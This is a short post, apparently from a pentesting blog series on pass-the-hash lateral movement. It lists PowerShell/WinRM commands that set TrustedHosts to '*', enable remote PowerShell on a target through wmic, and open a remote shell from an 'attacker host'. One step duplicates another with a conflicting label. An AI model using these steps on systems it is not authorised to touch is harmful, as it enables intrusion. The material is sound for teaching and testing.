Last one on the « pass the hash » series.
Initially we used a remote RDP console.
We then demonstrated netcat reverse shell.
What if we dont have RDP or cant/dont want to use netcat to the remote target?
WinRM to the rescue !
1.Ensure WinRM is set on the attacker host : winrm quickconfig
2.Add trusted hosts * (or filter to an ip) on attacker host : powershell « Set-Item WSMan:\localhost\Client\TrustedHosts -Value « * » -Force »
3.Enable psremoting on the remote target host (use wmic / see previous article) : powershell.exe « enable-psremoting -force »
4.Add trusted hosts * (or filter to an ip) on attacker host : powershell « Set-Item WSMan:\localhost\Client\TrustedHosts -Value « * » -Force » (use wmic / see previous article)
5.Enjoy a remote shell under powershell (from the attacker host) : Enter-PSSession -ComputerName target
One Response to “Demonstrating lateral movement with NTHASH Part #6”
Leave a Reply
Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.
[…] previous articles, we have used Pass The Hass to perform lateral movement. This time, lets drop PTH and use token […]